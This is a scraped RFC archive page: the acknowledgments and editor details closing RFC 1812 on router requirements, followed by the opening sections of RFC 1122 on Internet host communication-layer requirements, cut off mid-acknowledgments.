By Jove, I am not covetous for gold,
Nor care I who doth feed upon my cost;
It yearns me not if men my garments wear;
Such outward things dwell not in my desires:
But if it be a sin to covet honour,
I am the most offending soul alive.
No, faith, my coz, wish not a man from England:
God's peace! I would not lose so great an honour
As one man more, methinks, would share from me
For the best hope I have. O, do not wish one more!
Rather proclaim it, Westmoreland, through my host,
That he which hath no stomach to this fight,
Let him depart; his passport shall be made
And crowns for convoy put into his purse:
We would not die in that man's company
That fears his fellowship to die with us.
This day is called the feast of Crispian:
He that outlives this day, and comes safe home,
Will stand a tip-toe when the day is named,
And rouse him at the name of Crispian.
He that shall live this day, and see old age,
Will yearly on the vigil feast his neighbours,
And say 'To-morrow is Saint Crispian:'
Then will he strip his sleeve and show his scars.
And say 'These wounds I had on Crispin's day.'
Old men forget: yet all shall be forgot,
But he'll remember with advantages
What feats he did that day: then shall our names.
Familiar in his mouth as household words
Harry the king, Bedford and Exeter,
Warwick and Talbot, Salisbury and Gloucester,

Be in their flowing cups freshly remember'd.
This story shall the good man teach his son;
And Crispin Crispian shall ne'er go by,
From this day to the ending of the world,
But we in it shall be remember'd;
We few, we happy few, we band of brothers;
For he to-day that sheds his blood with me
Shall be my brother; be he ne'er so vile,
This day shall gentle his condition:
And gentlemen in England now a-bed
Shall think themselves accursed they were not here,
And hold their manhoods cheap whiles any speaks
That fought with us upon Saint Crispin's day.

-- William Shakespeare

This memo is a product of the IETF's Router Requirements Working
Group. A memo such as this one is of necessity the work of many more
people than could be listed here. A wide variety of vendors, network
managers, and other experts from the Internet community graciously
contributed their time and wisdom to improve the quality of this
memo. The editor wishes to extend sincere thanks to all of them.

The current editor also wishes to single out and extend his heartfelt
gratitude and appreciation to the original editor of this document;
Philip Almquist. Without Philip's work, both as the original editor
and as the Chair of the working group, this document would not have
been produced. He also wishes to express deep and heartfelt
gratitude to the previous editor, Frank Kastenholz. Frank changed
the original document from a collection of information to a useful
description of IP technology - in his words, a "snapshot" of the
technology in 1991. One can only hope that this snapshot, of the
technology in 1994, is as clear.

Philip Almquist, Jeffrey Burgan, Frank Kastenholz, and Cathy
Wittbrodt each wrote major chapters of this memo. Others who made
major contributions to the document included Bill Barns, Steve
Deering, Kent England, Jim Forster, Martin Gross, Jeff Honig, Steve
Knowles, Yoni Malachi, Michael Reilly, and Walt Wimer.

Additional text came from Andy Malis, Paul Traina, Art Berggreen,
John Cavanaugh, Ross Callon, John Lekashman, Brian Lloyd, Gary
Malkin, Milo Medin, John Moy, Craig Partridge, Stephanie Price, Yakov
Rekhter, Steve Senum, Richard Smith, Frank Solensky, Rich Woundy, and
others who have been inadvertently overlooked.

Some of the text in this memo has been (shamelessly) plagiarized from
earlier documents, most notably RFC-1122 by Bob Braden and the Host

Requirements Working Group, and RFC-1009 by Bob Braden and Jon
Postel. The work of these earlier authors is gratefully
acknowledged.

Jim Forster was a co-chair of the Router Requirements Working Group
during its early meetings, and was instrumental in getting the group
off to a good start. Jon Postel, Bob Braden, and Walt Prue also
contributed to the success by providing a wealth of good advice
before the group's first meeting. Later on, Phill Gross, Vint Cerf,
and Noel Chiappa all provided valuable advice and support.

Mike St. Johns coordinated the Working Group's interactions with the
security community, and Frank Kastenholz coordinated the Working
Group's interactions with the network management area. Allison
Mankin and K.K. Ramakrishnan provided expertise on the issues of
congestion control and resource allocation.

Many more people than could possibly be listed or credited here
participated in the deliberations of the Router Requirements Working
Group, either through electronic mail or by attending meetings.
However, the efforts of Ross Callon and Vince Fuller in sorting out
the difficult issues of route choice and route leaking are especially
acknowledged.

The editor thanks his employer, Cisco Systems, for allowing him to
spend the time necessary to produce the 1994 snapshot.

Editor's Address

The address of the current editor of this document is

Fred Baker
Cisco Systems
519 Lado Drive
Santa Barbara, California 93111
USA

Phone:+1 805-681-0115

EMail: fred@cisco.com

Comment on RFC 1812

Comments about this RFC:

* RFC 1812: receiver RFC 1812 documents by hpnet (9/23/2004)
* RFC 1812: 6dsrrdsyrgrhb DSHTGRFGYT TTH FG by sanjay (7/24/2005)

Previous: RFC 1811 - U.S

Next: RFC 1813 - NFS Version 3 Protocol Specification

[ RFC Index | RFC Search | Usenet FAQs | Web FAQs | Documents | Cities ]

RFC 1122 (RFC1122)

Internet RFC/STD/FYI/BCP Archives
[ RFC Index | RFC Search | Usenet FAQs | Web FAQs | Documents | Cities ]

Alternate Formats: rfc1122.txt | rfc1122.txt.pdf

Comment on RFC 1122
RFC 1122 - Requirements for Internet Hosts - Communication Layers

Network Working Group Internet Engineering Task Force
Request for Comments: 1122 R. Braden, Editor
October 1989

Requirements for Internet Hosts -- Communication Layers

Status of This Memo

This RFC is an official specification for the Internet community. It
incorporates by reference, amends, corrects, and supplements the
primary protocol standards documents relating to hosts. Distribution
of this document is unlimited.

Summary

This is one RFC of a pair that defines and discusses the requirements
for Internet host software. This RFC covers the communications
protocol layers: link layer, IP layer, and transport layer; its
companion RFC-1123 covers the application and support protocols.

Table of Contents

1. INTRODUCTION ............................................... 5
1.1 The Internet Architecture .............................. 6
1.1.1 Internet Hosts .................................... 6
1.1.2 Architectural Assumptions ......................... 7
1.1.3 Internet Protocol Suite ........................... 8
1.1.4 Embedded Gateway Code ............................. 10
1.2 General Considerations ................................. 12
1.2.1 Continuing Internet Evolution ..................... 12
1.2.2 Robustness Principle .............................. 12
1.2.3 Error Logging ..................................... 13
1.2.4 Configuration ..................................... 14
1.3 Reading this Document .................................. 15
1.3.1 Organization ...................................... 15
1.3.2 Requirements ...................................... 16
1.3.3 Terminology ....................................... 17
1.4 Acknowledgments ........................................ 20

2. LINK LAYER .................................................. 21
2.1 INTRODUCTION ........................................... 21

RFC1122 INTRODUCTION October 1989

2.2 PROTOCOL WALK-THROUGH .................................. 21
2.3 SPECIFIC ISSUES ........................................ 21
2.3.1 Trailer Protocol Negotiation ...................... 21
2.3.2 Address Resolution Protocol -- ARP ................ 22
2.3.2.1 ARP Cache Validation ......................... 22
2.3.2.2 ARP Packet Queue ............................. 24
2.3.3 Ethernet and IEEE 802 Encapsulation ............... 24
2.4 LINK/INTERNET LAYER INTERFACE .......................... 25
2.5 LINK LAYER REQUIREMENTS SUMMARY ........................ 26

3. INTERNET LAYER PROTOCOLS .................................... 27
3.1 INTRODUCTION ............................................ 27
3.2 PROTOCOL WALK-THROUGH .................................. 29
3.2.1 Internet Protocol -- IP ............................ 29
3.2.1.1 Version Number ............................... 29
3.2.1.2 Checksum ..................................... 29
3.2.1.3 Addressing ................................... 29
3.2.1.4 Fragmentation and Reassembly ................. 32
3.2.1.5 Identification ............................... 32
3.2.1.6 Type-of-Service .............................. 33
3.2.1.7 Time-to-Live ................................. 34
3.2.1.8 Options ...................................... 35
3.2.2 Internet Control Message Protocol -- ICMP .......... 38
3.2.2.1 Destination Unreachable ...................... 39
3.2.2.2 Redirect ..................................... 40
3.2.2.3 Source Quench ................................ 41
3.2.2.4 Time Exceeded ................................ 41
3.2.2.5 Parameter Problem ............................ 42
3.2.2.6 Echo Request/Reply ........................... 42
3.2.2.7 Information Request/Reply .................... 43
3.2.2.8 Timestamp and Timestamp Reply ................ 43
3.2.2.9 Address Mask Request/Reply ................... 45
3.2.3 Internet Group Management Protocol IGMP ........... 47
3.3 SPECIFIC ISSUES ........................................ 47
3.3.1 Routing Outbound Datagrams ........................ 47
3.3.1.1 Local/Remote Decision ........................ 47
3.3.1.2 Gateway Selection ............................ 48
3.3.1.3 Route Cache .................................. 49
3.3.1.4 Dead Gateway Detection ....................... 51
3.3.1.5 New Gateway Selection ........................ 55
3.3.1.6 Initialization ............................... 56
3.3.2 Reassembly ........................................ 56
3.3.3 Fragmentation ..................................... 58
3.3.4 Local Multihoming ................................. 60
3.3.4.1 Introduction ................................. 60
3.3.4.2 Multihoming Requirements ..................... 61
3.3.4.3 Choosing a Source Address .................... 64
3.3.5 Source Route Forwarding ........................... 65

RFC1122 INTRODUCTION October 1989

3.3.6 Broadcasts ........................................ 66
3.3.7 IP Multicasting ................................... 67
3.3.8 Error Reporting ................................... 69
3.4 INTERNET/TRANSPORT LAYER INTERFACE ..................... 69
3.5 INTERNET LAYER REQUIREMENTS SUMMARY .................... 72

4. TRANSPORT PROTOCOLS ......................................... 77
4.1 USER DATAGRAM PROTOCOL -- UDP .......................... 77
4.1.1 INTRODUCTION ...................................... 77
4.1.2 PROTOCOL WALK-THROUGH ............................. 77
4.1.3 SPECIFIC ISSUES ................................... 77
4.1.3.1 Ports ........................................ 77
4.1.3.2 IP Options ................................... 77
4.1.3.3 ICMP Messages ................................ 78
4.1.3.4 UDP Checksums ................................ 78
4.1.3.5 UDP Multihoming .............................. 79
4.1.3.6 Invalid Addresses ............................ 79
4.1.4 UDP/APPLICATION LAYER INTERFACE ................... 79
4.1.5 UDP REQUIREMENTS SUMMARY .......................... 80
4.2 TRANSMISSION CONTROL PROTOCOL -- TCP ................... 82
4.2.1 INTRODUCTION ...................................... 82
4.2.2 PROTOCOL WALK-THROUGH ............................. 82
4.2.2.1 Well-Known Ports ............................. 82
4.2.2.2 Use of Push .................................. 82
4.2.2.3 Window Size .................................. 83
4.2.2.4 Urgent Pointer ............................... 84
4.2.2.5 TCP Options .................................. 85
4.2.2.6 Maximum Segment Size Option .................. 85
4.2.2.7 TCP Checksum ................................. 86
4.2.2.8 TCP Connection State Diagram ................. 86
4.2.2.9 Initial Sequence Number Selection ............ 87
4.2.2.10 Simultaneous Open Attempts .................. 87
4.2.2.11 Recovery from Old Duplicate SYN ............. 87
4.2.2.12 RST Segment ................................. 87
4.2.2.13 Closing a Connection ........................ 87
4.2.2.14 Data Communication .......................... 89
4.2.2.15 Retransmission Timeout ...................... 90
4.2.2.16 Managing the Window ......................... 91
4.2.2.17 Probing Zero Windows ........................ 92
4.2.2.18 Passive OPEN Calls .......................... 92
4.2.2.19 Time to Live ................................ 93
4.2.2.20 Event Processing ............................ 93
4.2.2.21 Acknowledging Queued Segments ............... 94
4.2.3 SPECIFIC ISSUES ................................... 95
4.2.3.1 Retransmission Timeout Calculation ........... 95
4.2.3.2 When to Send an ACK Segment .................. 96
4.2.3.3 When to Send a Window Update ................. 97
4.2.3.4 When to Send Data ............................ 98

RFC1122 INTRODUCTION October 1989

4.2.3.5 TCP Connection Failures ...................... 100
4.2.3.6 TCP Keep-Alives .............................. 101
4.2.3.7 TCP Multihoming .............................. 103
4.2.3.8 IP Options ................................... 103
4.2.3.9 ICMP Messages ................................ 103
4.2.3.10 Remote Address Validation ................... 104
4.2.3.11 TCP Traffic Patterns ........................ 104
4.2.3.12 Efficiency .................................. 105
4.2.4 TCP/APPLICATION LAYER INTERFACE ................... 106
4.2.4.1 Asynchronous Reports ......................... 106
4.2.4.2 Type-of-Service .............................. 107
4.2.4.3 Flush Call ................................... 107
4.2.4.4 Multihoming .................................. 108
4.2.5 TCP REQUIREMENT SUMMARY ........................... 108

5. REFERENCES ................................................. 112

RFC1122 INTRODUCTION October 1989

1. INTRODUCTION

This document is one of a pair that defines and discusses the
requirements for host system implementations of the Internet protocol
suite. This RFC covers the communication protocol layers: link
layer, IP layer, and transport layer. Its companion RFC,
"Requirements for Internet Hosts -- Application and Support"
[INTRO:1], covers the application layer protocols. This document
should also be read in conjunction with "Requirements for Internet
Gateways" [INTRO:2].

These documents are intended to provide guidance for vendors,
implementors, and users of Internet communication software. They
represent the consensus of a large body of technical experience and
wisdom, contributed by the members of the Internet research and
vendor communities.

This RFC enumerates standard protocols that a host connected to the
Internet must use, and it incorporates by reference the RFCs and
other documents describing the current specifications for these
protocols. It corrects errors in the referenced documents and adds
additional discussion and guidance for an implementor.

For each protocol, this document also contains an explicit set of
requirements, recommendations, and options. The reader must
understand that the list of requirements in this document is
incomplete by itself; the complete set of requirements for an
Internet host is primarily defined in the standard protocol
specification documents, with the corrections, amendments, and
supplements contained in this RFC.

A good-faith implementation of the protocols that was produced after
careful reading of the RFC's and with some interaction with the
Internet technical community, and that followed good communications
software engineering practices, should differ from the requirements
of this document in only minor ways. Thus, in many cases, the
"requirements" in this RFC are already stated or implied in the
standard protocol documents, so that their inclusion here is, in a
sense, redundant. However, they were included because some past
implementation has made the wrong choice, causing problems of
interoperability, performance, and/or robustness.

This document includes discussion and explanation of many of the
requirements and recommendations. A simple list of requirements
would be dangerous, because:

o Some required features are more important than others, and some
features are optional.

RFC1122 INTRODUCTION October 1989

o There may be valid reasons why particular vendor products that
are designed for restricted contexts might choose to use
different specifications.

However, the specifications of this document must be followed to meet
the general goal of arbitrary host interoperation across the
diversity and complexity of the Internet system. Although most
current implementations fail to meet these requirements in various
ways, some minor and some major, this specification is the ideal
towards which we need to move.

These requirements are based on the current level of Internet
architecture. This document will be updated as required to provide
additional clarifications or to include additional information in
those areas in which specifications are still evolving.

This introductory section begins with a brief overview of the
Internet architecture as it relates to hosts, and then gives some
general advice to host software vendors. Finally, there is some
guidance on reading the rest of the document and some terminology.

1.1 The Internet Architecture

General background and discussion on the Internet architecture and
supporting protocol suite can be found in the DDN Protocol
Handbook [INTRO:3]; for background see for example [INTRO:9],
[INTRO:10], and [INTRO:11]. Reference [INTRO:5] describes the
procedure for obtaining Internet protocol documents, while
[INTRO:6] contains a list of the numbers assigned within Internet
protocols.

1.1.1 Internet Hosts

A host computer, or simply "host," is the ultimate consumer of
communication services. A host generally executes application
programs on behalf of user(s), employing network and/or
Internet communication services in support of this function.
An Internet host corresponds to the concept of an "End-System"
used in the OSI protocol suite [INTRO:13].

An Internet communication system consists of interconnected
packet networks supporting communication among host computers
using the Internet protocols. The networks are interconnected
using packet-switching computers called "gateways" or "IP
routers" by the Internet community, and "Intermediate Systems"
by the OSI world [INTRO:13]. The RFC "Requirements for
Internet Gateways" [INTRO:2] contains the official
specifications for Internet gateways. That RFC together with

RFC1122 INTRODUCTION October 1989

the present document and its companion [INTRO:1] define the
rules for the current realization of the Internet architecture.

Internet hosts span a wide range of size, speed, and function.
They range in size from small microprocessors through
workstations to mainframes and supercomputers. In function,
they range from single-purpose hosts (such as terminal servers)
to full-service hosts that support a variety of online network
services, typically including remote login, file transfer, and
electronic mail.

A host is generally said to be multihomed if it has more than
one interface to the same or to different networks. See
Section 1.1.3 on "Terminology".

1.1.2 Architectural Assumptions

The current Internet architecture is based on a set of
assumptions about the communication system. The assumptions
most relevant to hosts are as follows:

(a) The Internet is a network of networks.

Each host is directly connected to some particular
network(s); its connection to the Internet is only
conceptual. Two hosts on the same network communicate
with each other using the same set of protocols that they
would use to communicate with hosts on distant networks.

(b) Gateways don't keep connection state information.

To improve robustness of the communication system,
gateways are designed to be stateless, forwarding each IP
datagram independently of other datagrams. As a result,
redundant paths can be exploited to provide robust service
in spite of failures of intervening gateways and networks.

All state information required for end-to-end flow control
and reliability is implemented in the hosts, in the
transport layer or in application programs. All
connection control information is thus co-located with the
end points of the communication, so it will be lost only
if an end point fails.

(c) Routing complexity should be in the gateways.

Routing is a complex and difficult problem, and ought to
be performed by the gateways, not the hosts. An important

RFC1122 INTRODUCTION October 1989

objective is to insulate host software from changes caused
by the inevitable evolution of the Internet routing
architecture.

(d) The System must tolerate wide network variation.

A basic objective of the Internet design is to tolerate a
wide range of network characteristics -- e.g., bandwidth,
delay, packet loss, packet reordering, and maximum packet
size. Another objective is robustness against failure of
individual networks, gateways, and hosts, using whatever
bandwidth is still available. Finally, the goal is full
"open system interconnection": an Internet host must be
able to interoperate robustly and effectively with any
other Internet host, across diverse Internet paths.

Sometimes host implementors have designed for less
ambitious goals. For example, the LAN environment is
typically much more benign than the Internet as a whole;
LANs have low packet loss and delay and do not reorder
packets. Some vendors have fielded host implementations
that are adequate for a simple LAN environment, but work
badly for general interoperation. The vendor justifies
such a product as being economical within the restricted
LAN market. However, isolated LANs seldom stay isolated
for long; they are soon gatewayed to each other, to
organization-wide internets, and eventually to the global
Internet system. In the end, neither the customer nor the
vendor is served by incomplete or substandard Internet
host software.

The requirements spelled out in this document are designed
for a full-function Internet host, capable of full
interoperation over an arbitrary Internet path.

1.1.3 Internet Protocol Suite

To communicate using the Internet system, a host must implement
the layered set of protocols comprising the Internet protocol
suite. A host typically must implement at least one protocol
from each layer.

The protocol layers used in the Internet architecture are as
follows [INTRO:4]:

o Application Layer

RFC1122 INTRODUCTION October 1989

The application layer is the top layer of the Internet
protocol suite. The Internet suite does not further
subdivide the application layer, although some of the
Internet application layer protocols do contain some
internal sub-layering. The application layer of the
Internet suite essentially combines the functions of the
top two layers -- Presentation and Application -- of the
OSI reference model.

We distinguish two categories of application layer
protocols: user protocols that provide service directly
to users, and support protocols that provide common system
functions. Requirements for user and support protocols
will be found in the companion RFC [INTRO:1].

The most common Internet user protocols are:

o Telnet (remote login)
o FTP (file transfer)
o SMTP (electronic mail delivery)

There are a number of other standardized user protocols
[INTRO:4] and many private user protocols.

Support protocols, used for host name mapping, booting,
and management, include SNMP, BOOTP, RARP, and the Domain
Name System (DNS) protocols.

o Transport Layer

The transport layer provides end-to-end communication
services for applications. There are two primary
transport layer protocols at present:

o Transmission Control Protocol (TCP)
o User Datagram Protocol (UDP)

TCP is a reliable connection-oriented transport service
that provides end-to-end reliability, resequencing, and
flow control. UDP is a connectionless ("datagram")
transport service.

Other transport protocols have been developed by the
research community, and the set of official Internet
transport protocols may be expanded in the future.

Transport layer protocols are discussed in Chapter 4.

RFC1122 INTRODUCTION October 1989

o Internet Layer

All Internet transport protocols use the Internet Protocol
(IP) to carry data from source host to destination host.
IP is a connectionless or datagram internetwork service,
providing no end-to-end delivery guarantees. Thus, IP
datagrams may arrive at the destination host damaged,
duplicated, out of order, or not at all. The layers above
IP are responsible for reliable delivery service when it
is required. The IP protocol includes provision for
addressing, type-of-service specification, fragmentation
and reassembly, and security information.

The datagram or connectionless nature of the IP protocol
is a fundamental and characteristic feature of the
Internet architecture. Internet IP was the model for the
OSI Connectionless Network Protocol [INTRO:12].

ICMP is a control protocol that is considered to be an
integral part of IP, although it is architecturally
layered upon IP, i.e., it uses IP to carry its data end-
to-end just as a transport protocol like TCP or UDP does.
ICMP provides error reporting, congestion reporting, and
first-hop gateway redirection.

IGMP is an Internet layer protocol used for establishing
dynamic host groups for IP multicasting.

The Internet layer protocols IP, ICMP, and IGMP are
discussed in Chapter 3.

o Link Layer

To communicate on its directly-connected network, a host
must implement the communication protocol used to
interface to that network. We call this a link layer or
media-access layer protocol.

There is a wide variety of link layer protocols,
corresponding to the many different types of networks.
See Chapter 2.

1.1.4 Embedded Gateway Code

Some Internet host software includes embedded gateway
functionality, so that these hosts can forward packets as a

RFC1122 INTRODUCTION October 1989

gateway would, while still performing the application layer
functions of a host.

Such dual-purpose systems must follow the Gateway Requirements
RFC [INTRO:2] with respect to their gateway functions, and
must follow the present document with respect to their host
functions. In all overlapping cases, the two specifications
should be in agreement.

There are varying opinions in the Internet community about
embedded gateway functionality. The main arguments are as
follows:

o Pro: in a local network environment where networking is
informal, or in isolated internets, it may be convenient
and economical to use existing host systems as gateways.

There is also an architectural argument for embedded
gateway functionality: multihoming is much more common
than originally foreseen, and multihoming forces a host to
make routing decisions as if it were a gateway. If the
multihomed host contains an embedded gateway, it will
have full routing knowledge and as a result will be able
to make more optimal routing decisions.

o Con: Gateway algorithms and protocols are still changing,
and they will continue to change as the Internet system
grows larger. Attempting to include a general gateway
function within the host IP layer will force host system
maintainers to track these (more frequent) changes. Also,
a larger pool of gateway implementations will make
coordinating the changes more difficult. Finally, the
complexity of a gateway IP layer is somewhat greater than
that of a host, making the implementation and operation
tasks more complex.

In addition, the style of operation of some hosts is not
appropriate for providing stable and robust gateway
service.

There is considerable merit in both of these viewpoints. One
conclusion can be drawn: an host administrator must have
conscious control over whether or not a given host acts as a
gateway. See Section 3.1 for the detailed requirements.

RFC1122 INTRODUCTION October 1989

1.2 General Considerations

There are two important lessons that vendors of Internet host
software have learned and which a new vendor should consider
seriously.

1.2.1 Continuing Internet Evolution

The enormous growth of the Internet has revealed problems of
management and scaling in a large datagram-based packet
communication system. These problems are being addressed, and
as a result there will be continuing evolution of the
specifications described in this document. These changes will
be carefully planned and controlled, since there is extensive
participation in this planning by the vendors and by the
organizations responsible for operations of the networks.

Development, evolution, and revision are characteristic of
computer network protocols today, and this situation will
persist for some years. A vendor who develops computer
communication software for the Internet protocol suite (or any
other protocol suite!) and then fails to maintain and update
that software for changing specifications is going to leave a
trail of unhappy customers. The Internet is a large
communication network, and the users are in constant contact
through it. Experience has shown that knowledge of
deficiencies in vendor software propagates quickly through the
Internet technical community.

1.2.2 Robustness Principle

At every layer of the protocols, there is a general rule whose
application can lead to enormous benefits in robustness and
interoperability [IP:1]:

"Be liberal in what you accept, and
conservative in what you send"

Software should be written to deal with every conceivable
error, no matter how unlikely; sooner or later a packet will
come in with that particular combination of errors and
attributes, and unless the software is prepared, chaos can
ensue. In general, it is best to assume that the network is
filled with malevolent entities that will send in packets
designed to have the worst possible effect. This assumption
will lead to suitable protective design, although the most
serious problems in the Internet have been caused by
unenvisaged mechanisms triggered by low-probability events;

RFC1122 INTRODUCTION October 1989

mere human malice would never have taken so devious a course!

Adaptability to change must be designed into all levels of
Internet host software. As a simple example, consider a
protocol specification that contains an enumeration of values
for a particular header field -- e.g., a type field, a port
number, or an error code; this enumeration must be assumed to
be incomplete. Thus, if a protocol specification defines four
possible error codes, the software must not break when a fifth
code shows up. An undefined code might be logged (see below),
but it must not cause a failure.

The second part of the principle is almost as important:
software on other hosts may contain deficiencies that make it
unwise to exploit legal but obscure protocol features. It is
unwise to stray far from the obvious and simple, lest untoward
effects result elsewhere. A corollary of this is "watch out
for misbehaving hosts"; host software should be prepared, not
just to survive other misbehaving hosts, but also to cooperate
to limit the amount of disruption such hosts can cause to the
shared communication facility.

1.2.3 Error Logging

The Internet includes a great variety of host and gateway
systems, each implementing many protocols and protocol layers,
and some of these contain bugs and mis-features in their
Internet protocol software. As a result of complexity,
diversity, and distribution of function, the diagnosis of
Internet problems is often very difficult.

Problem diagnosis will be aided if host implementations include
a carefully designed facility for logging erroneous or
"strange" protocol events. It is important to include as much
diagnostic information as possible when an error is logged. In
particular, it is often useful to record the header(s) of a
packet that caused an error. However, care must be taken to
ensure that error logging does not consume prohibitive amounts
of resources or otherwise interfere with the operation of the
host.

There is a tendency for abnormal but harmless protocol events
to overflow error logging files; this can be avoided by using a
"circular" log, or by enabling logging only while diagnosing a
known failure. It may be useful to filter and count duplicate
successive messages. One strategy that seems to work well is:
(1) always count abnormalities and make such counts accessible
through the management protocol (see [INTRO:1]); and (2) allow

RFC1122 INTRODUCTION October 1989

the logging of a great variety of events to be selectively
enabled. For example, it might useful to be able to "log
everything" or to "log everything for host X".

Note that different managements may have differing policies
about the amount of error logging that they want normally
enabled in a host. Some will say, "if it doesn't hurt me, I
don't want to know about it", while others will want to take a
more watchful and aggressive attitude about detecting and
removing protocol abnormalities.

1.2.4 Configuration

It would be ideal if a host implementation of the Internet
protocol suite could be entirely self-configuring. This would
allow the whole suite to be implemented in ROM or cast into
silicon, it would simplify diskless workstations, and it would
be an immense boon to harried LAN administrators as well as
system vendors. We have not reached this ideal; in fact, we
are not even close.

At many points in this document, you will find a requirement
that a parameter be a configurable option. There are several
different reasons behind such requirements. In a few cases,
there is current uncertainty or disagreement about the best
value, and it may be necessary to update the recommended value
in the future. In other cases, the value really depends on
external factors -- e.g., the size of the host and the
distribution of its communication load, or the speeds and
topology of nearby networks -- and self-tuning algorithms are
unavailable and may be insufficient. In some cases,
configurability is needed because of administrative
requirements.

Finally, some configuration options are required to communicate
with obsolete or incorrect implementations of the protocols,
distributed without sources, that unfortunately persist in many
parts of the Internet. To make correct systems coexist with
these faulty systems, administrators often have to "mis-
configure" the correct systems. This problem will correct
itself gradually as the faulty systems are retired, but it
cannot be ignored by vendors.

When we say that a parameter must be configurable, we do not
intend to require that its value be explicitly read from a
configuration file at every boot time. We recommend that
implementors set up a default for each parameter, so a
configuration file is only necessary to override those defaults

RFC1122 INTRODUCTION October 1989

that are inappropriate in a particular installation. Thus, the
configurability requirement is an assurance that it will be
POSSIBLE to override the default when necessary, even in a
binary-only or ROM-based product.

This document requires a particular value for such defaults in
some cases. The choice of default is a sensitive issue when
the configuration item controls the accommodation to existing
faulty systems. If the Internet is to converge successfully to
complete interoperability, the default values built into
implementations must implement the official protocol, not
"mis-configurations" to accommodate faulty implementations.
Although marketing considerations have led some vendors to
choose mis-configuration defaults, we urge vendors to choose
defaults that will conform to the standard.

Finally, we note that a vendor needs to provide adequate
documentation on all configuration parameters, their limits and
effects.

1.3 Reading this Document

1.3.1 Organization

Protocol layering, which is generally used as an organizing
principle in implementing network software, has also been used
to organize this document. In describing the rules, we assume
that an implementation does strictly mirror the layering of the
protocols. Thus, the following three major sections specify
the requirements for the link layer, the internet layer, and
the transport layer, respectively. A companion RFC [INTRO:1]
covers application level software. This layerist organization
was chosen for simplicity and clarity.

However, strict layering is an imperfect model, both for the
protocol suite and for recommended implementation approaches.
Protocols in different layers interact in complex and sometimes
subtle ways, and particular functions often involve multiple
layers. There are many design choices in an implementation,
many of which involve creative "breaking" of strict layering.
Every implementor is urged to read references [INTRO:7] and
[INTRO:8].

This document describes the conceptual service interface
between layers using a functional ("procedure call") notation,
like that used in the TCP specification [TCP:1]. A host
implementation must support the logical information flow

RFC1122 INTRODUCTION October 1989

implied by these calls, but need not literally implement the
calls themselves. For example, many implementations reflect
the coupling between the transport layer and the IP layer by
giving them shared access to common data structures. These
data structures, rather than explicit procedure calls, are then
the agency for passing much of the information that is
required.

In general, each major section of this document is organized
into the following subsections:

(1) Introduction

(2) Protocol Walk-Through -- considers the protocol
specification documents section-by-section, correcting
errors, stating requirements that may be ambiguous or
ill-defined, and providing further clarification or
explanation.

(3) Specific Issues -- discusses protocol design and
implementation issues that were not included in the walk-
through.

(4) Interfaces -- discusses the service interface to the next
higher layer.

(5) Summary -- contains a summary of the requirements of the
section.

Under many of the individual topics in this document, there is
parenthetical material labeled "DISCUSSION" or
"IMPLEMENTATION". This material is intended to give
clarification and explanation of the preceding requirements
text. It also includes some suggestions on possible future
directions or developments. The implementation material
contains suggested approaches that an implementor may want to
consider.

The summary sections are intended to be guides and indexes to
the text, but are necessarily cryptic and incomplete. The
summaries should never be used or referenced separately from
the complete RFC.

1.3.2 Requirements

In this document, the words that are used to define the
significance of each particular requirement are capitalized.

RFC1122 INTRODUCTION October 1989

These words are:

* "MUST"

This word or the adjective "REQUIRED" means that the item
is an absolute requirement of the specification.

* "SHOULD"

This word or the adjective "RECOMMENDED" means that there
may exist valid reasons in particular circumstances to
ignore this item, but the full implications should be
understood and the case carefully weighed before choosing
a different course.

* "MAY"

This word or the adjective "OPTIONAL" means that this item
is truly optional. One vendor may choose to include the
item because a particular marketplace requires it or
because it enhances the product, for example; another
vendor may omit the same item.

An implementation is not compliant if it fails to satisfy one
or more of the MUST requirements for the protocols it
implements. An implementation that satisfies all the MUST and
all the SHOULD requirements for its protocols is said to be
"unconditionally compliant"; one that satisfies all the MUST
requirements but not all the SHOULD requirements for its
protocols is said to be "conditionally compliant".

1.3.3 Terminology

This document uses the following technical terms:

Segment
A segment is the unit of end-to-end transmission in the
TCP protocol. A segment consists of a TCP header followed
by application data. A segment is transmitted by
encapsulation inside an IP datagram.

Message
In this description of the lower-layer protocols, a
message is the unit of transmission in a transport layer
protocol. In particular, a TCP segment is a message. A
message consists of a transport protocol header followed
by application protocol data. To be transmitted end-to-

RFC1122 INTRODUCTION October 1989

end through the Internet, a message must be encapsulated
inside a datagram.

IP Datagram
An IP datagram is the unit of end-to-end transmission in
the IP protocol. An IP datagram consists of an IP header
followed by transport layer data, i.e., of an IP header
followed by a message.

In the description of the internet layer (Section 3), the
unqualified term "datagram" should be understood to refer
to an IP datagram.

Packet
A packet is the unit of data passed across the interface
between the internet layer and the link layer. It
includes an IP header and data. A packet may be a
complete IP datagram or a fragment of an IP datagram.

Frame
A frame is the unit of transmission in a link layer
protocol, and consists of a link-layer header followed by
a packet.

Connected Network
A network to which a host is interfaced is often known as
the "local network" or the "subnetwork" relative to that
host. However, these terms can cause confusion, and
therefore we use the term "connected network" in this
document.

Multihomed
A host is said to be multihomed if it has multiple IP
addresses. For a discussion of multihoming, see Section
3.3.4 below.

Physical network interface
This is a physical interface to a connected network and
has a (possibly unique) link-layer address. Multiple
physical network interfaces on a single host may share the
same link-layer address, but the address must be unique
for different hosts on the same physical network.

Logical [network] interface
We define a logical [network] interface to be a logical
path, distinguished by a unique IP address, to a connected
network. See Section 3.3.4.

RFC1122 INTRODUCTION October 1989

Specific-destination address
This is the effective destination address of a datagram,
even if it is broadcast or multicast; see Section 3.2.1.3.

Path
At a given moment, all the IP datagrams from a particular
source host to a particular destination host will
typically traverse the same sequence of gateways. We use
the term "path" for this sequence. Note that a path is
uni-directional; it is not unusual to have different paths
in the two directions between a given host pair.

MTU
The maximum transmission unit, i.e., the size of the
largest packet that can be transmitted.

The terms frame, packet, datagram, message, and segment are
illustrated by the following schematic diagrams:

A. Transmission on connected network:
_______________________________________________
| LL hdr | IP hdr | (data) |
|________|________|_____________________________|

<---------- Frame ----------------------------->
<----------Packet -------------------->

B. Before IP fragmentation or after IP reassembly:
______________________________________
| IP hdr | transport| Application Data |
|________|____hdr___|__________________|

<-------- Datagram ------------------>
<-------- Message ----------->
or, for TCP:
______________________________________
| IP hdr | TCP hdr | Application Data |
|________|__________|__________________|

<-------- Datagram ------------------>
<-------- Segment ----------->

RFC1122 INTRODUCTION October 1989

1.4 Acknowledgments

This document incorporates contributions and comments from a large
group of Internet protocol experts, including representatives of
university and research labs, vendors, and government agencies.
It was assembled primarily by the Host Requirements Working Group
of the Internet Engineering Task Force (IETF).

The Editor would especially like to acknowledge the tireless
dedication of the following people, who attended many long
meetings and generated 3 million bytes of electronic mail over the
past 18 months in pursuit of this document: Philip Almquist, Dave
